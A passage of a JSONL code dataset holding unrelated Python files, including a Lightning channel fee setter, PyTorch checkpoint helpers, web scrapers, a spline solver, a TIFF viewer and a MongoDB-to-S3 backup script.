state\n","sub_path":"car_controller/RemoteSlamController.py","file_name":"RemoteSlamController.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"236782400","text":"#!/usr/bin/env python3\n\"\"\"\nThis script is provided for educational purposes, it sets channel\nfees based on chain costs and imbalance.\nThis far more basic than similar tools and likely not flexible enough\nfor advanced operators, but it should give a good idea of what a fair\nfee is to beginners.\nRun `python3 feesetter.py -h` for parameters.\n\"\"\"\n\nimport argparse\n\nimport numpy as np\n\nfrom nodeinterface import NodeInterface\n\n# Handle arguments\nparser = argparse.ArgumentParser(description='Set channel rate fees based on simple heuristics')\nparser.add_argument('--chainfee', type=int, default=6000,\n help='The estimated cost in sats of opening and closing a channel, accounting for force close risk and hiring fees, default 6000')\nparser.add_argument('--passes', type=int, default=2,\n help='The number of times channels must be fully used to break even, default 2')\nparser.add_argument('--rebalfactor', type=int, default=10,\n help='This factor controls how agressively fees will adjust with channel imbalance, default 10')\nparser.add_argument('--basefee', type=int, default=50,\n help='The base fee in msat to apply to all channels, default 50')\nparser.add_argument('--minhtlc', type=int,\n help='If basefee is 0 this will be automatically set to prevent free forwards')\nparser.add_argument('--sink', action='append', default=[],\n help='Specify the pubkeys of nodes that receive vastly more than they send')\nparser.add_argument('--timelockdelta', type=int, default=40,\n help='The time lock delta to apply to all channels, default 40')\nparser.add_argument('--apply', action=\"store_true\",\n help='By default fees are suggested but not applied, set this flag to apply them')\nargs = parser.parse_args()\n\nmynode = NodeInterface.fromconfig()\n\n# Find channel ratios and average channel size\n# Using an average prevents overcharging for small channels and\n# undercharging for large ones\nchansizes = []\nchanratios = {}\nmychannels = mynode.ListChannels().channels\nbalancesbypeer = {}\nfor chan in mychannels:\n # Need channel size to get average\n effective_capacity = (chan.capacity\n - chan.local_constraints.chan_reserve_sat\n - chan.remote_constraints.chan_reserve_sat)\n chansizes.append(effective_capacity)\n\n # Need these ratios when printing\n remote_ratio = chan.remote_balance / chan.capacity\n chanratios[chan.channel_point] = remote_ratio\n\n if chan.remote_pubkey not in balancesbypeer:\n balancesbypeer[chan.remote_pubkey] = {\n 'local':0,'remote':0, 'total':0}\n\n balancesbypeer[chan.remote_pubkey]['local'] += chan.local_balance\n balancesbypeer[chan.remote_pubkey]['remote'] += chan.remote_balance\n balancesbypeer[chan.remote_pubkey]['total'] += chan.capacity\n\n# Find the basic rate fee\nbasicratefee = args.chainfee / np.mean(chansizes) / args.passes\n\n# Modify the rate fee for each channel for channel balance\ndef imbalancemodifier(remote_ratio):\n # The [0-1] integral of the function must equal 1\n factor = 1+args.rebalfactor*(remote_ratio-0.5)**5\n return max(factor, 0) # Make sure it's not negative\n\nif imbalancemodifier(0) <= 0:\n raise ValueError('--rebalfactor is too large, fees could be zero or negative')\n\n\nnewratefeesbypeer = {}\nminhtlcsbypeer = {}\nfor rkey, balances in balancesbypeer.items():\n ratio = balances['remote'] / balances['total']\n ratefee = basicratefee * imbalancemodifier(ratio)\n\n newratefeesbypeer[rkey] = ratefee\n\n if rkey in args.sink:\n # We only have one pass to profit from, account for this\n ratefee *= args.passes\n\n # If base fee is 0, set min htlc to prevent free forwards\n if args.basefee <= 0:\n minhtlc = int(np.ceil(1/ratefee))\n if args.minhtlc:\n minhtlc = max(minhtlc, args.minhtlc)\n minhtlcsbypeer[rkey] = minhtlc\n elif args.minhtlc:\n minhtlcsbypeer[rkey] = args.minhtlc\n\n\n# Print the proposed fees\nprint('basefee rate minhtlc remote cap Alias')\nprint(' (msat) fee (msat) ratio (ksat) ')\nfor chan in mychannels:\n rate_fee = newratefeesbypeer[chan.remote_pubkey]\n remote_ratio = chanratios[chan.channel_point]\n base_fee = args.basefee\n\n if chan.remote_pubkey in args.sink:\n # Assume only 1 end-to end movement of funds\n # remove the effect of the passes factor previously added\n rate_fee *= args.passes * 1.1\n\n if chan.remote_pubkey in minhtlcsbypeer:\n minhtlc = minhtlcsbypeer[chan.remote_pubkey]\n else:\n minhtlc = chan.local_constraints.min_htlc_msat\n\n print('{:6} {:.3%} {:5} {:4.0%} {:5.0f} {}'.format(\n base_fee, rate_fee, minhtlc, remote_ratio,\n chan.capacity/1e3, mynode.getAlias(chan.remote_pubkey)))\n\nif args.apply:\n print('Applying fees')\n\n for chan in mychannels:\n kwargs = dict(\n chan_point = chan.channel_point,\n fee_rate = newratefeesbypeer[chan.remote_pubkey],\n base_fee_msat = args.basefee,\n time_lock_delta = args.timelockdelta,\n # ~ max_htlc_msat = int(chan.capacity*1000*0.4)\n )\n if chan.remote_pubkey in minhtlcsbypeer:\n kwargs['min_htlc_msat_specified'] = True\n kwargs['min_htlc_msat'] = minhtlcsbypeer[chan.remote_pubkey]\n\n mynode.UpdateChannelPolicy(**kwargs)\n\n print('Fees applied')\n\n\n\n\n\n\n","sub_path":"setfeepolicy.py","file_name":"setfeepolicy.py","file_ext":"py","file_size_in_byte":5477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"315565114","text":"import torch\nimport torch.nn as nn\nimport os\n\n\ndef weights_init(m):\n classname = m.__class__.__name__\n\n if classname.find('conv') != -1:\n nn.init.normal_(m.weight.data,0.0,0.02)\n elif classname.find('BatchNorm') != -1:\n nn.init.normal_(m.weight.data, 1.0, 0.02)\n nn.init.constant_(m.bias.data, 0)\n\n\ndef initModel(self, device):\n resultpath = os.path.join(self.result_root, 'checkpoint.pth')\n if os.path.isfile(resultpath):\n print(\"restoring checkpoint\")\n checkpoint = torch.load(resultpath, map_location=device)\n self.model.load_state_dict(checkpoint['model'])\n self.optim.load_state_dict(checkpoint['optim'])\n self.epoch = checkpoint['epoch']\n self.loss = checkpoint['loss']\n for state in self.optim.state.values():\n for k, v in state.items():\n if torch.is_tensor(v):\n state[k] = v.cuda()\n else:\n self.model.apply(weights_init)\n\n self.model.to(device)\n\n\ndef saveCheckpoint(self, filename):\n path = os.path.join(self.result_root, filename)\n torch.save({\n 'epoch': self.epoch,\n 'model': self.model.state_dict(),\n 'optim': self.optim.state_dict(),\n 'loss': self.loss\n }, path)\n","sub_path":"Model/InitModel.py","file_name":"InitModel.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"448433403","text":"import requests\nimport urllib\nimport lxml.html\nimport time\nbqg_url=\"https://www.biquge.com/\" #用来衔接网址\nurl=\"https://www.biquge.com/28_28334/\"\nchapter_url=[]\nchapter_url_list1=[]\nheaders = {\n 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Chrome/60.0.3100.0 Safari/537.36'\n } \nrequest= urllib.request.Request(url=url, headers=headers)\nresponse=urllib.request.urlopen(request)\nhtml=lxml.html.parse(response)\nhrefs=html.xpath('//*[@id=\"list\"]/dl/dd[*]/a/text()')\nchapter_url_list=html.xpath('//*[@id=\"list\"]/dl/dd[*]/a/@href') #得到类似这种的列表[/28_28334/1558940.html , /28_28334/1558940.html ......] \ntitle=hrefs[12:]\nfor chapter_url in chapter_url_list[12:]:\n chapter_url_list1.append(urllib.parse.urljoin(bqg_url,chapter_url)) #每个网址衔接网络地址,使其可用\n\ndef read_chapter(url): \n request1= urllib.request.Request(url=url, headers=headers)\n response1=urllib.request.urlopen(request1)\n html1=lxml.html.parse(response1)\n name=html1.xpath('//*[@class=\"bookname\"]/h1/text()')[0] #找到标题\n content=[]\n contents=html1.xpath('//*[@id=\"content\"]/text()') #找到内容列表\n for i in contents:\n content+=\"\\n\\n\"+\" \"+i.strip() #增添内容的格式\n content = \"\".join(content) #列表变为字符串\n content=content.replace(\"wWw。QВ5.coМ//\", \"\")\n content=content.replace(\"最新全本:、、、、、、、、、、\", \"\") #去掉内容中广告\n with open('C:\\\\Users\\\\admin\\\\Desktop\\\\code\\\\water_margin\\\\水浒传\\\\' +name+'.txt','w+') as f:\n f.write(content.strip()) #创建txt\n print(name+' 下载成功')\n\nif __name__ == \"__main__\":\n for x in chapter_url_list1: #遍历每个url\n time.sleep(10)\n read_chapter(x)\n\n \n","sub_path":"code/water_margin/water.py","file_name":"water.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"172901996","text":"from GaussianElimination_splines import simpleGaussianElimination,partialGaussianElimination,totalGaussianElimination\n\n\ndef matrix_lin(x, b):\n a = [[0 for i in range((len(x)-1)*2)] for j in range((len(x)-1)*2)]\n a[0][0] = x[0]\n a[0][1] = 1\n a[1][0] = x[1]\n a[1][1] = 1\n\n j = 2\n for i in range(2,len(x)):\n a[i][j] = x[i]\n a[i][j+1] = 1\n j += 2\n \n i = 1\n j = 0\n for k in range(len(x),((len(x)*2)-2)):\n b += [0]\n a[k][j] = x[i]\n a[k][j+1] = 1\n a[k][j+2] = -x[i]\n a[k][j+3] = -1\n i += 1\n j += 2\n\n return a,b\n \ndef traces(x):\n \n \n result = \"\"\n for i in range(len(x)):\n if i % 2 == 0:\n if x[i] >= 0.0:\n result += \"+\"+str(x[i])+\"x\"\n else:\n result += str(x[i])+\"x\"\n else:\n if x[i] >= 0.0:\n result += \"+\"+str(x[i])+\" \"\n else:\n result += str(x[i])+\" \"\n \n print(\"\\n Traces: \\n\")\n for i in result.split(\" \"):\n print(i)\n \n\n\nif __name__ == \"__main__\":\n x = [-1,0,3,4]\n y = [15.5,3,8,1]\n b = y\n A, b = matrix_lin(x,b)\n print(\"A: \\n\"+str(A))\n print(\"b: \\n\"+str(b))\n t1=totalGaussianElimination(A, b)\n #t2=partialGaussianElimination(A, b)\n #t3=simpleGaussianElimination(A, b)\n\n traces(t1)\n #traces(t2)\n #traces(t3)","sub_path":"Metodos/Trazlin_spline.py","file_name":"Trazlin_spline.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"597173142","text":"#\n# Created on Mar 7, 2017\n#\n# @author: dpascualhe\n#\n# Based on @nuriaoyaga code:\n# https://github.com/RoboticsURJC-students/2016-tfg-nuria-oyaga/blob/\n# master/camera/camera.py\n#\n# And @Javii91 code:\n# https://github.com/Javii91/Domotic/blob/master/Others/cameraview.py\n#\n\nimport sys\nimport random\nimport traceback\nimport threading\n\nimport cv2\nimport numpy as np\nimport easyiceconfig as EasyIce\nfrom PIL import Image\nfrom jderobot import CameraPrx\n\n\nclass Camera:\n\n def __init__ (self,cam):\n ''' Camera class gets images from live video. '''\n\n self.cam = cam\n self.count = 0\n self.lock = threading.Lock()\n\n if self.cam.hasproxy():\n self.im = self.cam.getImage()\n self.im_height = self.im.height\n self.im_width = self.im.width\n\n print('Image size: {0}x{1} px'.format(\n self.im_width, self.im_height))\n else:\n raise SystemExit(\"Interface camera not connected\")\n\n def getImage(self):\n ''' Gets the image from the webcam and returns the original image. '''\n if self.cam:\n im = np.frombuffer(self.im.data, dtype=np.uint8)\n im = self.transformImage(im)\n im = np.reshape(im, (540, 404, 3))\n return im\n \n def transformImage(self, im):\n im_resized = np.reshape(im, (self.im_height, self.im_width, 3))\n im_resized = cv2.resize(im_resized, (404, 540))\n return im_resized\n\n def update(self):\n ''' Updates the camera every time the thread changes. '''\n if self.cam:\n self.lock.acquire()\n\n self.im = self.cam.getImage()\n self.im_height = self.im.height\n self.im_width = self.im.width\n\n self.lock.release()\n \n ","sub_path":"Camera/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":1789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"323192045","text":"import sys\nsys.stdin = open('2819_input.txt')\n\ndr = [-1, 1, 0, 0]\ndc = [0, 0, -1, 1]\nresult = set()\n\ndef find_num(cr, cc, num):\n if len(num) == 7:\n result.add(num)\n return\n \n for i in range(4):\n row, col = cr+dr[i], cc+dc[i]\n if arr[row][col] != -1:\n find_num(row, col, num + arr[row][col])\n\nT = int(input())\nfor tc in range(1, T+1):\n N = 4\n # input 받아서 벽 만들기\n arr = [[-1]*(N+2)]\n for _ in range(N):\n arr.append([-1] + list(input().split()) + [-1])\n arr.append([-1]*(N+2))\n\n for i in range(1, N+1):\n for j in range(1, N+1):\n find_num(i, j, arr[i][j])\n \n print(\"#{} {}\".format(tc, len(result)))\n","sub_path":"0310/swea_2819.py","file_name":"swea_2819.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"9240289","text":"highscore_string=input(\"Insert high scores: \")\nhighscore=highscore_string.split(',')\nl=len(highscore)\nfor i in range(l):\n highscore[i]=int(highscore[i])\nfor i, item in enumerate(highscore):\n print(i+1,\".\",item)\nwhile True:\n add=int(input(\"Add a new highscore: \"))\n highscore.append(add)\n highscore_sorted=sorted(highscore, reverse=True)\n for i, items in enumerate(highscore_sorted):\n print(i+1,\".\",items)\n if i==4:\n break\n","sub_path":"Session8/high_score.py","file_name":"high_score.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"89724210","text":"global primes_GLOBL\n\nprimes_GLOBL = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97, 101]\n\ndef factoration(number):\n factors = []\n\n result = number/1\n\n while result != 1:\n\n for pri in primes_GLOBL:\n if result % pri == 0:\n factors.append(pri)\n result = result/pri\n break\n\n return factors[::-1]\n\n\ndef factors_handling(factors, primes_test):\n\n test_two = factors.count(2)//3\n\n if test_two < 1:\n return factors, primes_test\n\n for i in range(test_two): # Test conditions\n if factors[0] == 2:\n # Continue this function\n break\n elif factors.count(2) % 3 == 0 and factors[0] != 3:\n # End this fuction\n return factors, primes_test\n else:\n # Continue this function\n break\n\n for i in range(test_two):\n primes_test.pop()\n factors.pop()\n\n if factors[0] == 3 and factors[0] == factors[1]:\n factors[0] = factors[0]*2\n continue\n\n factors[-1] = factors[-1]*2\n factors.sort(reverse=True)\n\n return factors, primes_test\n\n\ntimes = input()\ncheck_list = []\n\nfor _ in range(times):\n check_list.append(input())\n\nfor num in check_list:\n prime_factors = []\n result = num\n while result != 1:\n for pri in primes_GLOBL:\n if result % pri == 0:\n prime_factors.append(pri)\n result = result / pri\n break\n prime_factors = prime_factors[::-1]\n\n primes_list = primes_GLOBL[:len(prime_factors)]\n\n prime_factors, primes_list = factors_handling(prime_factors, primes_list)\n\n min_number = 1\n index = 0\n for prime_number in primes_list:\n x = (prime_number ** (prime_factors[index] - 1))\n min_number = min_number * x\n index += 1\n\n print(num,':',min_number % 1000000007, end=', ')","sub_path":"Uri/2869_v3_py2.py","file_name":"2869_v3_py2.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"82829528","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 10 12:14:34 2015\n\n@author: robot\n\"\"\"\nfrom __future__ import (absolute_import, division,print_function, unicode_literals)\nfrom future.builtins import (bytes, dict, int, list, object, range, str, ascii, chr, hex, input, next, oct, open, pow, round, super, filter, map, zip)\nimport time\ntic=time.time()\nimport os, sys\nimport numpy as np\nfrom pyqtgraph.Qt import QtCore, QtGui\nimport pyqtgraph as pg\nimport tifffile\nimport json\nimport re\n\nclass Viewer(QtGui.QMainWindow):\n \n def __init__(self):\n super(Viewer, self).__init__()\n \n self.initUI()\n \n def initUI(self): \n\n self.ImageView = pg.ImageView()\n self.resize(800,800)\n self.setCentralWidget(self.ImageView)\n self.statusBar()\n\n openTiff = QtGui.QAction(QtGui.QIcon('open.png'), 'Open tiff', self)\n openTiff.setShortcut('Ctrl+O')\n openTiff.setStatusTip('Open new File')\n openTiff.triggered.connect(self.openDialog)\n \n saveFile = QtGui.QAction(QtGui.QIcon('save.png'), 'Save', self)\n saveFile.setShortcut('Ctrl+S')\n saveFile.setStatusTip('Save File')\n saveFile.triggered.connect(self.saveDialog)\n\n menubar = self.menuBar()\n fileMenu = menubar.addMenu('&File')\n fileMenu.addAction(openTiff)\n fileMenu.addAction(saveFile)\n \n #self.setGeometry(300, 300, 350, 300)\n self.setWindowTitle('ImageView')\n self.show()\n\n\n def txt2dict(metadata):\n meta=dict()\n try:\n metadata=json.loads(metadata.decode('utf-8'))\n return metadata\n except ValueError: #if the metadata isn't in JSON\n pass\n for line in metadata.splitlines():\n line=re.split('[:=]',line)\n if len(line)==1:\n meta[line[0]]=''\n else:\n meta[line[0].lstrip().rstrip()]=line[1].lstrip().rstrip()\n return meta\n\n\n def open_file(self,filename):\n\n self.statusBar().showMessage('Loading {}'.format(os.path.basename(filename)))\n t=time.time()\n Tiff=tifffile.TiffFile(filename)\n try:\n metadata=Tiff[0].image_description\n metadata = self.txt2dict(metadata)\n except AttributeError:\n metadata=dict()\n tif=Tiff.asarray().astype(np.float64)\n Tiff.close() \n #tif=imread(filename,plugin='tifffile').astype(g.m.settings['internal_data_type'])\n if len(tif.shape)>3: # WARNING THIS TURNS COLOR movies TO BLACK AND WHITE BY AVERAGING ACROSS THE THREE CHANNELS\n tif=np.mean(tif,3)\n tif=np.squeeze(tif) #this gets rid of the meaningless 4th dimention in .stk files\n if len(tif.shape)==3: #this could either be a movie or a colored still frame\n if tif.shape[2]==3: #this is probably a colored still frame\n tif=np.mean(tif,2)\n tif=np.transpose(tif,(1,0)) # This keeps the x and y the same as in FIJI. \n else:\n tif=np.transpose(tif,(0,2,1)) # This keeps the x and y the same as in FIJI. \n elif len(tif.shape)==2: # I haven't tested whether this preserved the x y and keeps it the same as in FIJI. TEST THIS!!\n tif=np.transpose(tif,(0,1))\n self.statusBar().showMessage('{} successfully loaded ({} s)'.format(os.path.basename(filename), time.time()-t))\n return tif \n\n \n def openDialog(self):\n\n filename = QtGui.QFileDialog.getOpenFileName(self, 'Open tiff file', \n '/home', '*.tif *.tiff *.stk')\n \n filename=str(filename)\n if filename=='':\n return False\n else:\n data = self.open_file(filename)\n print(len(data.shape))\n self.ImageView.setImage(data)\n \n \n\n def saveDialog(self):\n \n fname = QtGui.QFileDialog.getSaveFileName(self, 'Save file', \n '/home')\n \n f = open(fname, 'r')\n \n with f: \n data = f.read()\n print(data) \n\n \ndef main():\n if QtCore.QCoreApplication.instance() != None:\n app = QtCore.QCoreApplication.instance()\t\n else:\n app = QtGui.QApplication(sys.argv)\n ex = Viewer()\n sys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n main()\n \n","sub_path":"ImageView.py","file_name":"ImageView.py","file_ext":"py","file_size_in_byte":4388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"599577342","text":"from sys import stdin\nimport math\n\nfor line in stdin:\n if line.find('.') != -1:\n fao, fractional = [x for x in line[:len(line)-1].split('.')]\n else:\n fractional = '0'\n\n if fractional != \"\":\n fractional = float('.'+fractional)\n else:\n fractional = float('.0')\n\n line = float(line[:len(line)-1])\n\n cutoff = float(input())\n\n if fractional>cutoff:\n print(int(math.ceil(line)))\n else:\n print(int(math.floor(line)))\n \n","sub_path":"URI/1305 Cut Off Rounder/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"330767478","text":"\n\ndef print_tagged_ptr(debugger,verbose,tptr,toplevel=False):\n global global_HeaderStruct\n if (generalp(tptr)):\n base = untag_general(tptr)\n header_ptr = base - global_HeaderStruct._sizeof\n header = debugger.read_memory(header_ptr,8)\n if (header):\n stamp = header>>4\n if (verbose): debugger.print_(\"header@%x stamp = %d\" % (header_ptr,stamp))\n class_ = global_Kinds[stamp]\n name = class_._name\n printed = print_shallow_object_type(debugger,verbose,0,tptr,toplevel)\n if (printed): return\n debugger.print_(\"a %s\" % name )\n if (isinstance(class_,ClassKind)):\n for field in class_._fields.values():\n val = read_unsigned_at_offset(debugger,verbose,base,field._field_offset)\n debugger.print_(\"field %s: %s\" % (field._field_name,valid_tptr(val)))\n type_ = field._data_type\n print_shallow_object_type(debugger,verbose,\" \",val,type_,toplevel=False)\n if (class_._variable_array0):\n print_variable_array0(debugger,verbose,\" \",class_,tptr,toplevel=False)\n return\n return\n if (consp(tptr)):\n cons = Cons_O(untag_cons(tptr))\n debugger.print_(\"It's a cons\")\n debugger.print_(\"print_tagged_ptr handle: %s\\n\" % tptr)\n\n\n\n","sub_path":"lldb-clasp/clasp_inspect/old_printer.py","file_name":"old_printer.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"561477973","text":"import urllib.request\nimport requests\nfrom bs4 import BeautifulSoup\n\nreq = requests.get('https://icons8.com/icons/pack/free-icons')\nprint(req.status_code)\nsoup = BeautifulSoup(req.content,\"lxml\") \nimages = soup.find_all(\"div\",attrs={\"class\":\"icon\"})\ni = 1;\nfor image in images:\n print(image.find(\"a\",attrs={\"class\":\"icon-link\"}).img.get('src'))\n urllib.request.urlretrieve(image.find(\"a\",attrs={\"class\":\"icon-link\"}).img.get('src'),\"img/{}.png\".format(i))\n i+=1\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"566834609","text":"import time\nimport inspect\nimport traceback\n\nfrom contextlib import contextmanager\nfrom globals import logger\n\n\n@contextmanager\ndef log_this(context_alias, threshold=0):\n \"\"\"\n log记录上下文管理器\n :param context_alias: 代码片段的别名,请避免重复,建议使用{class_name}_{func_name}_{alias}\n :param threshold:\n :return:\n \"\"\"\n timer = time.perf_counter\n _start = timer()\n try:\n yield\n finally:\n end = timer()\n elapsed = (end - _start) * 1000\n if threshold <= 0 or threshold < elapsed:\n try:\n c = {\n \"context_alias\": context_alias,\n \"func_stack\": str(inspect.stack()[2]),\n \"time\": elapsed,\n \"timestamp\": time.time()\n }\n logger.info(c)\n except Exception as e:\n logger.warning(\"log_this error: {}\".format(traceback.format_exc()))\n","sub_path":"util/common/context_manager.py","file_name":"context_manager.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"15049644","text":"import gensim\nfrom gensim.models import Word2Vec\nfrom gensim.test.utils import datapath, get_tmpfile\nfrom gensim.models.keyedvectors import KeyedVectors\nimport numpy as np\nimport pandas as pd\nfrom gensim.scripts.glove2word2vec import glove2word2vec\nimport string\n\n\ndef readfiles(filename):\n\twith open(filename, 'r')as f:\n\t\tc = f.readlines()\n\tdata = [x.strip().split(' ') for x in c]\n\tcat_dict = {}\n\tfor i in data:\n\t\tcat_dict[i[0]]= i[1:]\n\treturn cat_dict\n\n\ndef readfilePandas(filename):\n df = pd.read_csv(filename, engine='python', header=None, names=['entity'])\n t = df.values.tolist()\n text = [item for sublist in t for item in sublist]\n return text\n\ndef loadmodel(embedding_file):\n #coversion = glove2word2vec(embedding_file, wiki2vecfile)\n model = KeyedVectors.load_word2vec_format(embedding_file)\n return model\n\n\ndef avgvectors(category,model):\n for c in string.punctuation:\n category = category.replace(c,\" \").lower()\n category = \" \".join(category.split())\n tmp = []\n print('category name--------')\n print(category)\n for i in category.split(' '):\n try:\n tmp.append(model[i])\n except:\n print('inside except')\n z= np.zeros((300,), dtype=int)\n tmp.append(z)\n print('no of vectors for the word, ',category, 'is, ', len(tmp))\n vec_avg = np.mean(tmp, axis=0)\n return vec_avg\n\ndef getVectors(cat_dict, wiki2vec_embed, op_vectorsFile):\n\tcat_vec = {}\n\tfor k,v in cat_dict.items():\n\t\ttmp = []\n\t\tprint('Russa -->',k)\n\t\tfor i in v:\n\t\t\tword = avgvectors(i,wiki2vec_embed)\n\t\t\ttmp.append(word)\n\t\tcat_avg = np.mean(tmp, axis=0)\n\t\top_vectorsFile.write(k+ '\\t' +str(len(tmp)) +'\\t'+ ' '.join([str(elem) for elem in word]))\n\t\top_vectorsFile.write('\\n')\n\t\tcat_vec[k] = cat_avg\n\treturn cat_vec\n\n\n\n\nif __name__ == \"__main__\":\n\tembed = loadmodel('wiki2vecVecfile.txt')\n\ttrain_cat_dict = readfiles('Etrain_cat')\n\ttrain_vectorsFile_avg = open('wiki2vec_AVG_train_catVectors','w')\n\ttrain_cat_vec = getVectors(train_cat_dict, embed, train_vectorsFile_avg)\n\n\ttest_cat_dict = readfiles('Etest_cat')\n\ttest_vectorsFile_avg = open('wiki2vec_AVG_test_catVectors','w')\n\ttest_cat_vec = getVectors(test_cat_dict, embed, test_vectorsFile_avg)\n\n\tdev_cat_dict = readfiles('Edev_cat')\n\tdev_vectorsFile_avg = open('wiki2vec_AVG_dev_catVectors','w')\n\tdev_cat_vec = getVectors(dev_cat_dict, embed, dev_vectorsFile_avg)\n","sub_path":"Language_Models/wiki2vecVectors.py","file_name":"wiki2vecVectors.py","file_ext":"py","file_size_in_byte":2540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"558520365","text":"from subprocess import check_call\nimport os\nfrom datetime import datetime\n\nimport boto3\nfrom init.config import get_config\nfrom init.load_data import BACKUP_DIR, BACKUP_MONGO_PREFIX, BACKUP_TS_FORMAT\n\ndef backupMongoDB():\n\t# YYYY-mm-DD-HHMMSS\n\tts = datetime.now().strftime(BACKUP_TS_FORMAT)\n\toutput_folder = '%s_%s' % (BACKUP_MONGO_PREFIX,ts)\n\toutput_tar = '%s.tgz' % (output_folder)\n\t\n\t# get backup user and s3 info\n\tconfig = get_config()\n\tmongo_user = config['MONGO_BACKUP_USER']\n\tmongo_pw = config['MONGO_BACKUP_PW']\n\taws_email = config[\"AWS_EMAIL\"]\n\ts3_bucket = config[\"S3_MONGO_BACKUP_BUCKET\"]\n\t\n\t# backup file names\n\tbackup_folder = os.path.join(BACKUP_DIR,output_folder)\n\tbackup_tar = os.path.join(BACKUP_DIR,output_tar)\n\t\n\t# backup commands\n\tcheck_call(['mkdir','-p',BACKUP_DIR])\n\tcheck_call(['mongodump','-u',mongo_user,'-p',mongo_pw,'--out=%s' % backup_folder])\n\tcheck_call(['tar', '-czf', backup_tar, '-C', BACKUP_DIR, output_folder])\n\n\t# Upload to s3\n\tcheck_call(['aws','s3','cp',backup_tar,'s3://%s/' % s3_bucket,'--grants','read=emailaddress=%s' % aws_email])\n\n\t# remove local folder and tar\n\tcheck_call(['rm', '-rf', backup_folder])\n\tcheck_call(['rm', backup_tar])\n\n\treturn True\n\nif __name__ == \"__main__\":\n\tbackupMongoDB()\n\n","sub_path":"bin/backupMongo.py","file_name":"backupMongo.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"305493395","text":"import pygame\nimport json\nfrom 外星人入侵.settings import Settings\nfrom 外星人入侵.game_stats import GameStats\nfrom 外星人入侵.scoreboard import Scoreboard\nfrom 外星人入侵.button import Button\nfrom 外星人入侵.ship import Ship\nfrom pygame.sprite import Group\nimport 外星人入侵.game_functions as gf\n\n\ndef get_max_score(filename):\n \"\"\"如果存储了最大分数, 就获取它\"\"\"\n try:\n with open(filename) as file_obj:\n num = json.load(file_obj)\n except FileNotFoundError:\n return None\n else:\n return num\n\n\ndef run_game():\n # 初始化pygame, Settings, 屏幕对象\n pygame.init()\n settings = Settings()\n screen = pygame.display.set_mode((settings.screen_width, settings.screen_height))\n pygame.display.set_caption(settings.caption)\n # 创建一艘飞船, 一个子弹编组和一个外星人编组\n ship = Ship(settings, screen)\n bullets = Group()\n aliens = Group()\n # 创建一个外星人群\n gf.create_fleet(settings, screen, ship, aliens)\n # 创建一个用于存储游戏统计信息的实例, 并创建记分牌\n stats = GameStats(settings)\n stats.ships_left -= 1\n stats.high_score = get_max_score(settings.max_score_file)\n sb = Scoreboard(settings, screen, stats)\n # 创建play按钮\n play_button = Button(settings, screen, \"Play\")\n # 开始游戏主循环\n while True:\n gf.check_events(settings, screen, stats, sb, ship, bullets, bullets, play_button)\n if stats.game_active:\n ship.update()\n gf.update_bullets(settings, screen, stats, sb, ship, aliens, bullets)\n gf.update_aliens(settings, stats, sb, screen, ship, aliens, bullets)\n gf.update_screen(settings, screen, stats, sb, ship, aliens, bullets, play_button)\n\n\nrun_game()\n","sub_path":"Jupyter_Notebook/Python入门/python编程:从入门到实践/外星人入侵/alien_invasion.py","file_name":"alien_invasion.py","file_ext":"py","file_size_in_byte":1824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"560058929","text":"from constrain import const_violation\n\n\ndef selection( f , fitness , target , trial, Fn):\n phi_b = const_violation(trial , Fn )\n phi_a = const_violation(target , Fn )\n \n # domination criteria\n q1 = ( phi_a == 0 and phi_b == 0)\n q2 = f < fitness\n\n r1 = ( phi_b == 0 )\n r2 = phi_a > 0\n\n s1 = ( phi_b < phi_a )\n s2 = phi_a > 0 and phi_b > 0 # phi_a corr to target vector\n\n if ((q1 and q2) or (r1 and r2) or (s1 and s2)):\n fitness = f ; target = trial # phi_b corr to donor vector\n return fitness , target\n \n","sub_path":"fCDE/selection.py","file_name":"selection.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"287175220","text":"import hug\r\n\r\nfrom modules.db_feeds import FeedsAlchemy\r\nfrom modules.general import General\r\n\r\n\r\nFeedsAlchemy = 